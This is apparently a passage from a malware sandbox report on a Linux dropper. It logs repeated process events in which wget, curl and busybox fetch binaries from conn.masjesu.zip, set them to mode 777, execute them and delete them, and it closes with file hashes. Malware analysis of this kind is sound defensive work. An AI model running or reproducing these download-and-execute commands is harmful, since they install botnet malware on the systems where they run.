/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:937
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:938
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:941
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:955
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:958
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:959
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:962
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:976
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:983
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:986
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97